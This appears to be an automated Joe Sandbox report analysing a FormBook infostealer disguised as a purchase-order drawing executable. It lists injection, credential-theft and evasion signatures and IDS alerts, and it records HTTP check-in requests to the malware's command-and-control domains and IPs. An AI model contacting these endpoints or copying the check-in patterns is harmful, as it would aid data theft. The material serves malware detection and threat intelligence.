Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
N4533DWG.exe

Overview

General Information

Sample name:N4533DWG.exe
renamed because original name is a hash value
Original sample name:DRAWING SINCO-AUTOMATION-6994745-PURCHASE-ORDER-SINCO-AUTOMATION-PO-322357781-Ref-6421SINCO-AUTOMATION4533DWG.exe
Analysis ID:1634984
MD5:c89d225170bdd6e39192acab2bdf1b59
SHA1:bac19e6f73d20e4c41f593941a1dd3383c0a88f3
SHA256:3a1312bebcd4b05675432543b45c299f823910f8eb839047537ffc2ec650171a
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • N4533DWG.exe (PID: 6360 cmdline: "C:\Users\user\Desktop\N4533DWG.exe" MD5: C89D225170BDD6E39192ACAB2BDF1B59)
    • svchost.exe (PID: 6436 cmdline: "C:\Users\user\Desktop\N4533DWG.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ICpHO9L5D6CxaaNC.exe (PID: 4804 cmdline: "C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\jjO36H0I.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • where.exe (PID: 7360 cmdline: "C:\Windows\SysWOW64\where.exe" MD5: 5630411B5F4F453CA575248F7AD4C89F)
          • ICpHO9L5D6CxaaNC.exe (PID: 1356 cmdline: "C:\Program Files (x86)\nyBGVifysrTRtKDlsSBFoQIyKgaaIjCgttwCjtetCHKSaBCQVQzymTQzhYRrzuPjYnVtzgAzacUy\IQoRtFw8.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7488 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • explorer.exe (PID: 7792 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 7808 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • WerFault.exe (PID: 4508 cmdline: C:\Windows\system32\WerFault.exe -u -p 7808 -s 8816 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • rundll32.exe (PID: 8124 cmdline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • explorer.exe (PID: 7452 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • WerFault.exe (PID: 6228 cmdline: C:\Windows\system32\WerFault.exe -u -p 7452 -s 7820 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • explorer.exe (PID: 7540 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2530150136.00000000056B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1576193206.0000000004A00000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1575534372.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.2253215877.0000000000A90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.2254186644.0000000002E60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\N4533DWG.exe", CommandLine: "C:\Users\user\Desktop\N4533DWG.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\N4533DWG.exe", ParentImage: C:\Users\user\Desktop\N4533DWG.exe, ParentProcessId: 6360, ParentProcessName: N4533DWG.exe, ProcessCommandLine: "C:\Users\user\Desktop\N4533DWG.exe", ProcessId: 6436, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\N4533DWG.exe", CommandLine: "C:\Users\user\Desktop\N4533DWG.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\N4533DWG.exe", ParentImage: C:\Users\user\Desktop\N4533DWG.exe, ParentProcessId: 6360, ParentProcessName: N4533DWG.exe, ProcessCommandLine: "C:\Users\user\Desktop\N4533DWG.exe", ProcessId: 6436, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T08:50:18.864952+010020507451Malware Command and Control Activity Detected192.168.2.64969613.248.169.4880TCP
                2025-03-11T08:50:43.188699+010020507451Malware Command and Control Activity Detected192.168.2.649702216.40.34.4180TCP
                2025-03-11T08:50:56.577139+010020507451Malware Command and Control Activity Detected192.168.2.649707199.59.243.22880TCP
                2025-03-11T08:51:09.913695+010020507451Malware Command and Control Activity Detected192.168.2.649711203.161.42.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T08:50:18.864952+010028554651A Network Trojan was detected192.168.2.64969613.248.169.4880TCP
                2025-03-11T08:50:43.188699+010028554651A Network Trojan was detected192.168.2.649702216.40.34.4180TCP
                2025-03-11T08:50:56.577139+010028554651A Network Trojan was detected192.168.2.649707199.59.243.22880TCP
                2025-03-11T08:51:09.913695+010028554651A Network Trojan was detected192.168.2.649711203.161.42.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-11T08:50:34.716638+010028554641A Network Trojan was detected192.168.2.649699216.40.34.4180TCP
                2025-03-11T08:50:37.329173+010028554641A Network Trojan was detected192.168.2.649700216.40.34.4180TCP
                2025-03-11T08:50:40.611654+010028554641A Network Trojan was detected192.168.2.649701216.40.34.4180TCP
                2025-03-11T08:50:48.765843+010028554641A Network Trojan was detected192.168.2.649703199.59.243.22880TCP
                2025-03-11T08:50:51.419004+010028554641A Network Trojan was detected192.168.2.649704199.59.243.22880TCP
                2025-03-11T08:50:53.963768+010028554641A Network Trojan was detected192.168.2.649706199.59.243.22880TCP
                2025-03-11T08:51:02.294876+010028554641A Network Trojan was detected192.168.2.649708203.161.42.7380TCP
                2025-03-11T08:51:04.774367+010028554641A Network Trojan was detected192.168.2.649709203.161.42.7380TCP
                2025-03-11T08:51:07.346009+010028554641A Network Trojan was detected192.168.2.649710203.161.42.7380TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.michaelaowen.xyz/gk57/?UJ=fLedd8LppB3DfLu&C8r=I4hn8YcO/jbksr5hMPbYQEoqOFlKPUwfS7K8XDJ+M6YuQzUY6HD+1bjdMYefaJHBZYXg19VE8QvtfaPZV55+FB86rocAnO3zLLdW9CaFyY3LbHObj8TLjhc75Lb4Tcnyh49nUSQ=Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: N4533DWG.exeReversingLabs: Detection: 50%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.2530150136.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1576193206.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575534372.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2253215877.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2254186644.0000000002E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575741699.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2254236592.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2528476866.0000000003A90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: N4533DWG.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.6:49714 version: TLS 1.2
                Source: Binary string: where.pdbGCTL source: svchost.exe, 00000002.00000003.1543237026.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 00000009.00000003.1531788230.0000000000824000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: where.pdb source: svchost.exe, 00000002.00000003.1543237026.000000000081A000.00000004.00000020.00020000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 00000009.00000003.1531788230.0000000000824000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: N4533DWG.exe, 00000000.00000003.1267315708.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, N4533DWG.exe, 00000000.00000003.1263752332.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1575774016.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1468172730.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1575774016.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466177797.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2254465824.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp, where.exe, 0000000A.00000003.1575884239.00000000046F4000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2254465824.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, where.exe, 0000000A.00000003.1578369513.00000000048A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: N4533DWG.exe, 00000000.00000003.1267315708.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, N4533DWG.exe, 00000000.00000003.1263752332.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1575774016.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1468172730.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1575774016.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466177797.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2254465824.0000000004BEE000.00000040.00001000.00020000.00000000.sdmp, where.exe, 0000000A.00000003.1575884239.00000000046F4000.00000004.00000020.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2254465824.0000000004A50000.00000040.00001000.00020000.00000000.sdmp, where.exe, 0000000A.00000003.1578369513.00000000048A7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: where.exe, 0000000A.00000002.2255228897.000000000507C000.00000004.10000000.00040000.00000000.sdmp, where.exe, 0000000A.00000002.2253277253.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1860175144.00000000156AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: where.exe, 0000000A.00000002.2255228897.000000000507C000.00000004.10000000.00040000.00000000.sdmp, where.exe, 0000000A.00000002.2253277253.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.000000000327C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1860175144.00000000156AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ICpHO9L5D6CxaaNC.exe, 00000009.00000002.2527413628.0000000000F7F000.00000002.00000001.01000000.00000005.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2525384756.0000000000F7F000.00000002.00000001.01000000.00000005.sdmp
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_0037449B
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037C75D FindFirstFileW,FindClose,0_2_0037C75D
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0037C7E8
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037F021
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037F17E
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037F47F
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00373833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00373833
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00373B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00373B56
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_0037BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037BD48

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49707 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49696 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49703 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49707 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49696 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49700 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49699 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49704 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49709 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49710 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49706 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49702 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49702 -> 216.40.34.41:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49711 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49711 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49708 -> 203.161.42.73:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49701 -> 216.40.34.41:80
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 204.79.197.203 443
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.michaelaowen.xyz
                Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=5A66BA27-30BF-4DEF-9ECD-A83E270DFEAA&user=m-1f3886e28b884acc9b955b3291d5e48e HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67caf3534c1d48abab0f2d014f2ab653.RefC=2025-03-07T13:23:31Z; MUIDB=0BE4CBFC7F146B131A19DE547E4F6AFC; _EDGE_V=1; MUID=0BE4CBFC7F146B131A19DE547E4F6AFC
                Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=EEDDAD20-DFBB-41B4-AC27-76B176612037&user=m-11e9b433eb72426ea9a3b5aa78872bfe HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67caf3534c1d48abab0f2d014f2ab653.RefC=2025-03-07T13:23:31Z; MUIDB=0BE4CBFC7F146B131A19DE547E4F6AFC; _EDGE_V=1; MUID=0BE4CBFC7F146B131A19DE547E4F6AFC
                Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=5EB02DBB-B99C-42D4-AC82-964D16F48032&user=m-e95ec34b68354621a6fd77b663e625ed HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67caf3534c1d48abab0f2d014f2ab653.RefC=2025-03-07T13:23:31Z; MUIDB=0BE4CBFC7F146B131A19DE547E4F6AFC; _EDGE_V=1; MUID=0BE4CBFC7F146B131A19DE547E4F6AFC
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 203.161.42.73 203.161.42.73
                Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\N4533DWG.exeCode function: 0_2_00382404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00382404
                Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=5A66BA27-30BF-4DEF-9ECD-A83E270DFEAA&user=m-1f3886e28b884acc9b955b3291d5e48e HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67caf3534c1d48abab0f2d014f2ab653.RefC=2025-03-07T13:23:31Z; MUIDB=0BE4CBFC7F146B131A19DE547E4F6AFC; _EDGE_V=1; MUID=0BE4CBFC7F146B131A19DE547E4F6AFC
                Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=EEDDAD20-DFBB-41B4-AC27-76B176612037&user=m-11e9b433eb72426ea9a3b5aa78872bfe HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67caf3534c1d48abab0f2d014f2ab653.RefC=2025-03-07T13:23:31Z; MUIDB=0BE4CBFC7F146B131A19DE547E4F6AFC; _EDGE_V=1; MUID=0BE4CBFC7F146B131A19DE547E4F6AFC
                Source: global trafficHTTP traffic detected: GET /v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=windows-windowsShell-feeds&osLocale=en-GB&CheckEnable=true&activityId=5EB02DBB-B99C-42D4-AC82-964D16F48032&user=m-e95ec34b68354621a6fd77b663e625ed HTTP/1.1Host: api.msn.comCookie: sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=67caf3534c1d48abab0f2d014f2ab653.RefC=2025-03-07T13:23:31Z; MUIDB=0BE4CBFC7F146B131A19DE547E4F6AFC; _EDGE_V=1; MUID=0BE4CBFC7F146B131A19DE547E4F6AFC
                Source: global trafficHTTP traffic detected: GET /gk57/?UJ=fLedd8LppB3DfLu&C8r=I4hn8YcO/jbksr5hMPbYQEoqOFlKPUwfS7K8XDJ+M6YuQzUY6HD+1bjdMYefaJHBZYXg19VE8QvtfaPZV55+FB86rocAnO3zLLdW9CaFyY3LbHObj8TLjhc75Lb4Tcnyh49nUSQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.michaelaowen.xyzConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /z9w1/?C8r=MfeZosbZ7rwDyHlOn5TFT4tVbG9OVIpa7t5kvEbup7YdH46UMv0nQM2KOFQJY6hFbLe4RWSfFl5nuwfqf5tOZuHcmgo8t/aR9aVA7GVOtTeZHWGefQ64FePcwOQEwlg285oqWD4=&UJ=fLedd8LppB3DfLu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.peetzlifestyle.netConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vh2f/?UJ=fLedd8LppB3DfLu&C8r=SMhXCt7PD97xxPcyjUW5uu6uR8dVv5AX/pkzgxsUFm5pDkE9TwSJVslSsy8dyfxF4lN5QOZgiVoCJ8KrDqWYjbH1eul5AvggBcUcqS1XCSm20f8ohyOT/FK6N/ixSbqfySIrV3Y= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.perfumedeparis.storeConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /drnv/?C8r=BvWH2L8budD2mOy6vmM+RXG3q28GdRsojSNTF1t6oR8SRDyjidVomRiFXuY1xrkoxA1qzhial2yECWXH4ftjjuqb100lTP+CeiLRsg8fJJZu0cDVVjM0+HQmp1aMx1f4C1yEGaw=&UJ=fLedd8LppB3DfLu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USHost: www.livream.liveConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
